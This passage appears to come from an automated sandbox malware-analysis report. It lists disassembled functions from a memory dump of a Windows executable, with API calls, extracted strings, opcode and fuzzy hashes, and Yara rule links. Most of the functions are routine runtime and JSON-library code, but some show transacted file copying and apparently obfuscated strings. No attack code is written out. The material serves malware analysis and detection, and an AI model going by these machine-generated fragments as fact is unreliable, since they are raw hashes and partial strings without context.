                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 2509303402-0
                                                                                                    • Opcode ID: e1c63e0220e471cd691036338e536c0fa59f9bdec3ef6868eca1ee1d5fa62def
                                                                                                    • Instruction ID: d2e0628ef23e4c9b2675df8823be0be2d1987371ec530bc30c7eab761a6d51e8
                                                                                                    • Opcode Fuzzy Hash: e1c63e0220e471cd691036338e536c0fa59f9bdec3ef6868eca1ee1d5fa62def
                                                                                                    • Instruction Fuzzy Hash: B2D1AE719002059FDB11CF79C981BAEBBF5BF0A301F14412FE995A7342DBB8A9498B64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0044EA63, Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 403COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,00421A95,?,00000001), ref: 0044EB09
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,00421A95,?,00000001), ref: 0044EB2D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Module$FileHandleName
                                                                                                    • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                                                                                                    • API String ID: 4146042529-3261600717
                                                                                                    • Opcode ID: 65529fed557b786163c570326af70ea110352edf082673693af1aac331673cb2
                                                                                                    • Instruction ID: cbb005097d3f3b27990ba66f3e62166c6a70d73ee99de89e4c8c3d79c473411f
                                                                                                    • Opcode Fuzzy Hash: 65529fed557b786163c570326af70ea110352edf082673693af1aac331673cb2
                                                                                                    • Instruction Fuzzy Hash: 51C10C71E002057AEB24AA26DC85FFF7368EF65708F1440AAFD09D5242F63C9E49CA5D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00424016, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 162COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0042401B
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeallocateH_prolog
                                                                                                    • String ID: 6rkw$; expected $; last read: '$syntax error $unexpected $while parsing
                                                                                                    • API String ID: 3708980276-377966253
                                                                                                    • Opcode ID: f8e3d8b2157d23111cf02576113c955310cb70154a6661487f07882615f762ed
                                                                                                    • Instruction ID: 81074ebcdcb79a76691b02df632c9b039df9ed7aba0e7bb70cb7591c71e232d5
                                                                                                    • Opcode Fuzzy Hash: f8e3d8b2157d23111cf02576113c955310cb70154a6661487f07882615f762ed
                                                                                                    • Instruction Fuzzy Hash: C3617F70900208DFCB05EFA5C991BEDFBB4AF58314F54405EE009F7282DBB85A99DB69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004280D6, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
                                                                                                    • API String ID: 3519838083-2786698324
                                                                                                    • Opcode ID: 4a495dc74c46c9530ee6837ae531c37f4910c6bfef5c9e9643f61759229618e9
                                                                                                    • Instruction ID: 02a3948f5721aa9a7a5a529718c8f0f58267128f42a49cbeb15ad061ff2bd8ad
                                                                                                    • Opcode Fuzzy Hash: 4a495dc74c46c9530ee6837ae531c37f4910c6bfef5c9e9643f61759229618e9
                                                                                                    • Instruction Fuzzy Hash: 24510430B01114DFDB04DF65D486BAE7BA5FF45314F84809EE8055B282DB78AC55CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00428285, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
                                                                                                    • API String ID: 3519838083-2786698324
                                                                                                    • Opcode ID: 9d4cb45d419ee4620783c0c0cd48349c2460d4bc81323b67cbb79ecffd1d615a
                                                                                                    • Instruction ID: d86e02c9f3b8653c4ca74c29ae50a8666d7dd5994750ee7d096b894a5484e904
                                                                                                    • Opcode Fuzzy Hash: 9d4cb45d419ee4620783c0c0cd48349c2460d4bc81323b67cbb79ecffd1d615a
                                                                                                    • Instruction Fuzzy Hash: 5951F430B001249FCB04EF65D486BAE7BB5FF45314F84809EE8059B292DB79AD54CBA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00428434, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
                                                                                                    • API String ID: 3519838083-2786698324
                                                                                                    • Opcode ID: d028862a6715dafbaf1e244a621cfc67416bdaee1d47a3ad37c64fb3358355c1
                                                                                                    • Instruction ID: ef96e7c7adb5d8b8a577f56dd21b84160054c2bc9393711002ca6b1764e60304
                                                                                                    • Opcode Fuzzy Hash: d028862a6715dafbaf1e244a621cfc67416bdaee1d47a3ad37c64fb3358355c1
                                                                                                    • Instruction Fuzzy Hash: 6251F430B00114AFDB04EF65D486BAE7BA4FF45314F84809EE8059B396DB78ED54CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004285E3, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
                                                                                                    • API String ID: 3519838083-2786698324
                                                                                                    • Opcode ID: d3354caba45fd1f1cea50c77a2bf27c00e0c25e015989f75e25a93662e20699f
                                                                                                    • Instruction ID: ab07ae53d137fbd5d81d814e9ed1350d295043a2f7c009784a1c927ca44db523
                                                                                                    • Opcode Fuzzy Hash: d3354caba45fd1f1cea50c77a2bf27c00e0c25e015989f75e25a93662e20699f
                                                                                                    • Instruction Fuzzy Hash: 8651E531B002109FCB04EF65D886BAE7BB5BF45314F94809EE8059B292DB78AD54CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00458774, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                    • API String ID: 0-537541572
                                                                                                    • Opcode ID: 37c81110ed85044dd5aceeaecdd1ea098defe0701216d777ea815dd99649c165
                                                                                                    • Instruction ID: 0fd8a11ffa56757e8ccf918c2529828d077cd395863ae7d7221dbacfabbe6c1d
                                                                                                    • Opcode Fuzzy Hash: 37c81110ed85044dd5aceeaecdd1ea098defe0701216d777ea815dd99649c165
                                                                                                    • Instruction Fuzzy Hash: 8821F672E01211BBCB21AB659C40A1B3658EF05765F25112BED46B7392EE38DC05C5ED
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041819E, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 421COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004181A3
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                      • Part of subcall function 00415505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,0041A94A,?,?,00000000), ref: 0041551B
                                                                                                      • Part of subcall function 00415505: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 00415541
                                                                                                      • Part of subcall function 00415505: CommitTransaction.KTMW32(00000000,?,0041A94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 0041554C
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted_strcat
                                                                                                    • String ID: $-<;$+*/"$:+$kf
                                                                                                    • API String ID: 1138659288-2765919554
                                                                                                    • Opcode ID: 432d0c6735dbeba5e3e35c7638072a85366c798e3530ffc6d81a22a8fd54addb
                                                                                                    • Instruction ID: bbc5fa7d8495b31bda5dc89a895256d9648518a168c8a285f567c0596adcd820
                                                                                                    • Opcode Fuzzy Hash: 432d0c6735dbeba5e3e35c7638072a85366c798e3530ffc6d81a22a8fd54addb
                                                                                                    • Instruction Fuzzy Hash: 1C028D70D00259CADF15DFA5C990BEDFBB1AF19304F1081AEE419B7282DB781A89CF59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0043A5E6, Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0043A5EB
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A5F9
                                                                                                    • int.LIBCPMT ref: 0043A610
                                                                                                      • Part of subcall function 00409703: std::_Lockit::_Lockit.LIBCPMT ref: 00409714
                                                                                                      • Part of subcall function 00409703: std::_Lockit::~_Lockit.LIBCPMT ref: 0040972E
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0043A64A
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A660
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0043A675
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
                                                                                                    • String ID:
                                                                                                    • API String ID: 2251497708-0
                                                                                                    • Opcode ID: 8da28d98de807ecf371120a3688b963d75b1e9e2796adba88c70522f423f566b
                                                                                                    • Instruction ID: 1b671ef6c59355c3337e8e153c21f328b4ee3e00f52423c5d6ae957731a9b330
                                                                                                    • Opcode Fuzzy Hash: 8da28d98de807ecf371120a3688b963d75b1e9e2796adba88c70522f423f566b
                                                                                                    • Instruction Fuzzy Hash: 6E112172D10115EBCB04EBA5C806ABF7764EF58728F10062FF851A7282DB789D00CBA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0043A6AC, Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0043A6B1
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A6BF
                                                                                                    • int.LIBCPMT ref: 0043A6D6
                                                                                                      • Part of subcall function 00409703: std::_Lockit::_Lockit.LIBCPMT ref: 00409714
                                                                                                      • Part of subcall function 00409703: std::_Lockit::~_Lockit.LIBCPMT ref: 0040972E
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0043A710
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A726
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0043A73B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
                                                                                                    • String ID:
                                                                                                    • API String ID: 2251497708-0
                                                                                                    • Opcode ID: 42856f84c8fe50d840c97780866a0629ca990773a1ce0ca6709d26a5b7a7207f
                                                                                                    • Instruction ID: 5ba2fc5c3ae075925c79352b4985af9af2bb908a4d5ddd33a0a84bd499be29b8
                                                                                                    • Opcode Fuzzy Hash: 42856f84c8fe50d840c97780866a0629ca990773a1ce0ca6709d26a5b7a7207f
                                                                                                    • Instruction Fuzzy Hash: 2B11E132D101259BCB14EBA5D855ABF7774EF88728F10052FF851A7282DB789D01CBE9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00444732, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,004447F3,00000000,00000FA0,0048BA44,00000000,?,0044491E,00000004,InitializeCriticalSectionEx,0046F52C,InitializeCriticalSectionEx,00000000), ref: 004447C2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID: api-ms-
                                                                                                    • API String ID: 3664257935-2084034818
                                                                                                    • Opcode ID: 467092fd28b44278f2e42a73788f31ccf4b46487d1dd9a34cceeb5f7ec7b4dc6
                                                                                                    • Instruction ID: 3b02404eba06537680092bea4a821423ad8daff009a81e922f8f1e142575d85b
                                                                                                    • Opcode Fuzzy Hash: 467092fd28b44278f2e42a73788f31ccf4b46487d1dd9a34cceeb5f7ec7b4dc6
                                                                                                    • Instruction Fuzzy Hash: B211CA76E41521ABFF224B689C45B5A73949F82764F154132E910FB3C0E7B8ED0286DE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041A4CA, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 363COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0041A4CF
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                      • Part of subcall function 00415505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,0041A94A,?,?,00000000), ref: 0041551B
                                                                                                      • Part of subcall function 00415505: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 00415541
                                                                                                      • Part of subcall function 00415505: CommitTransaction.KTMW32(00000000,?,0041A94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 0041554C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted_strcat
                                                                                                    • String ID: 4hU@[Y]W$>$nc
                                                                                                    • API String ID: 1138659288-2892674260
                                                                                                    • Opcode ID: 8ce16205f479405bf3d8a19b5731ec867f5dafc9167f24d4eca4a8725487a62a
                                                                                                    • Instruction ID: 69b4d2af1efff5d51a6b8d1072d60d64673e41b76a7434ce0b1ca36e894e148f
                                                                                                    • Opcode Fuzzy Hash: 8ce16205f479405bf3d8a19b5731ec867f5dafc9167f24d4eca4a8725487a62a
                                                                                                    • Instruction Fuzzy Hash: BAF1AE70D01289DBCF15DFA5C590AEDFBB1AF18304F2481AEE415B7282DB385A89CF59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041A10D, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 152COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0041A112
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeallocateH_prolog
                                                                                                    • String ID: TBip$dm|{$p
                                                                                                    • API String ID: 3708980276-1957332360
                                                                                                    • Opcode ID: 3fc8025caa68a4f06d08830b171c94335dd5b59858f573797aab7b33159a1046
                                                                                                    • Instruction ID: 8adcde93a9ef1de87be0b0092f894219ddf417b26770064712094cc799b8c3e8
                                                                                                    • Opcode Fuzzy Hash: 3fc8025caa68a4f06d08830b171c94335dd5b59858f573797aab7b33159a1046
                                                                                                    • Instruction Fuzzy Hash: 3351BF70D05248CBCF01EFEAD5915EEFBB0AF59304F64852EE0157B282DB781A4ACB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00458136, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00458064,?,00485030,0000000C,00458116,004225CF), ref: 0045818C
                                                                                                    • GetLastError.KERNEL32(?,00458064,?,00485030,0000000C,00458116,004225CF), ref: 00458196
                                                                                                    • __dosmaperr.LIBCMT ref: 004581C1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                    • String ID: P#o
                                                                                                    • API String ID: 2583163307-4032429066
                                                                                                    • Opcode ID: 28ff2cb8717397d330d23af217e4330399f92a87ed49a36cf90c16009352c4d0
                                                                                                    • Instruction ID: e1e6ae07f3327c36729fcadd6eef951ebb88615cc81bd845efabb0ee822ed807
                                                                                                    • Opcode Fuzzy Hash: 28ff2cb8717397d330d23af217e4330399f92a87ed49a36cf90c16009352c4d0
                                                                                                    • Instruction Fuzzy Hash: 5D016B32A045105EC2242236990677F67899FD2739F28061FFD08A72D3EF6D8C87839E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004243FC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::exception::exception.LIBCMT ref: 00424408
                                                                                                      • Part of subcall function 0040903F: ___std_exception_copy.LIBVCRUNTIME ref: 0040905D
                                                                                                    • std::exception::exception.LIBCMT ref: 00424420
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::exception::exception$___std_exception_copy
                                                                                                    • String ID: P>B$P>B
                                                                                                    • API String ID: 3231571295-939619877
                                                                                                    • Opcode ID: 4e93054eadd2fe5ede0c78d7ef0f7e29d9dca12dad372d62d1676b1f409477ce
                                                                                                    • Instruction ID: ce35b15519815ffbb67f81b71231185bf0eb88c8a934b23e7a6a4c5c11c1483f
                                                                                                    • Opcode Fuzzy Hash: 4e93054eadd2fe5ede0c78d7ef0f7e29d9dca12dad372d62d1676b1f409477ce
                                                                                                    • Instruction Fuzzy Hash: B6E04F726003046BD704EF56D8C08A7B7ACFB95364300C12BFD048B302D7B4E8158BE5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0046686E, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0046693E
                                                                                                    • _free.LIBCMT ref: 00466967
                                                                                                    • SetEndOfFile.KERNEL32(00000000,0046413C,00000000,0045A93D,?,?,?,?,?,?,?,0046413C,0045A93D,00000000), ref: 00466999
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,0046413C,0045A93D,00000000,?,?,?,?,00000000), ref: 004669B5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1547350101-0
                                                                                                    • Opcode ID: 9bb8ea1c2facafaefd627ec63108752fe1e305303697712d94e847a401f37159
                                                                                                    • Instruction ID: 797d3279cc2cce8438377f55fbe9cb65b9558afef913def79cecf0957a5e1668
                                                                                                    • Opcode Fuzzy Hash: 9bb8ea1c2facafaefd627ec63108752fe1e305303697712d94e847a401f37159
                                                                                                    • Instruction Fuzzy Hash: 234185F29006059BDB11ABBA8C46B9E3775EF44324F16051BFD14A7392FB3CC848866A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0046676B, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WriteConsoleW.KERNEL32(?,00421A56,?,00000000,?,?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD), ref: 00466782
                                                                                                    • GetLastError.KERNEL32(?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD,00000000,~eD,?,00457EBF,00000010), ref: 0046678E
                                                                                                      • Part of subcall function 00466754: CloseHandle.KERNEL32(FFFFFFFE,0046679E,?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD,00000000,~eD), ref: 00466764
                                                                                                    • ___initconout.LIBCMT ref: 0046679E
                                                                                                      • Part of subcall function 00466716: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00466745,0046346C,~eD,?,0045796B,00000000,00000005,~eD,00000000), ref: 00466729
                                                                                                    • WriteConsoleW.KERNEL32(?,00421A56,?,00000000,?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD,00000000), ref: 004667B3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                    • String ID:
                                                                                                    • API String ID: 2744216297-0
                                                                                                    • Opcode ID: ae5fb481802a9fa235141cf9efdc422cb2e1fe685c935f6145ad48c9fe88c6fa
                                                                                                    • Instruction ID: 763e7f8f878b4b777fd66d5375950774efbffa6078b9868dc8d7e1678cf0744a
                                                                                                    • Opcode Fuzzy Hash: ae5fb481802a9fa235141cf9efdc422cb2e1fe685c935f6145ad48c9fe88c6fa
                                                                                                    • Instruction Fuzzy Hash: 41F01236901115BFCF221F96DC049CA7F66EB097A5F064465FA1885120EA71C860DB9A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0045293D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 004529CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorHandling__start
                                                                                                    • String ID: pow
                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                    • Opcode ID: 5d3b4b31217a3aca56cef5da44c31b20b25d13a0e8c3bca57b1a042be99e7bd2
                                                                                                    • Instruction ID: f57b068ca202939e6be089322848423b8956c0ac15da669c57a9b2c85ad371fb
                                                                                                    • Opcode Fuzzy Hash: 5d3b4b31217a3aca56cef5da44c31b20b25d13a0e8c3bca57b1a042be99e7bd2
                                                                                                    • Instruction Fuzzy Hash: 81514E61A0410296C7157B15CA4136B2B90EB41B53F244D6BECC5413EBEFBD8CDD9A4F
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041A31F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: RR$dm|{
                                                                                                    • API String ID: 3519838083-3963068849
                                                                                                    • Opcode ID: c0812361fd55eeb71e364a8d3d948d0f360b6e0a320bac5853ca822a8e98fbba
                                                                                                    • Instruction ID: b30e87a83c857d55b2fceb9bedb5715a1448a84e52f685d6d7980b7f264c2b1f
                                                                                                    • Opcode Fuzzy Hash: c0812361fd55eeb71e364a8d3d948d0f360b6e0a320bac5853ca822a8e98fbba
                                                                                                    • Instruction Fuzzy Hash: 8441C431D052488FCF05EFE9D6915EDFBB1AF59304F24842EE4117B282DB782A4ACB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A440, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog2
                                                                                                    • String ID: ", "$: "
                                                                                                    • API String ID: 1857396960-747220369
                                                                                                    • Opcode ID: 3ebb163524b836a58e9336528dcddfb99cc604da141eb6db7052139b9219902c
                                                                                                    • Instruction ID: 14ddc9e10715370709e437af70b930bef286e9181cfd7794aa4f128aeba5fdd1
                                                                                                    • Opcode Fuzzy Hash: 3ebb163524b836a58e9336528dcddfb99cc604da141eb6db7052139b9219902c
                                                                                                    • Instruction Fuzzy Hash: 6231D0B0A01204AFCB14DF65D946BDEFBB5EF44704F10406FE405AB2C1EBB8AA55CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0043A929, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: false$true
                                                                                                    • API String ID: 3519838083-2658103896
                                                                                                    • Opcode ID: 554a9e8c29aeda20e02ce97903ee5a4130f6d8e91c2360f5ad8c9ebe88ee43c1
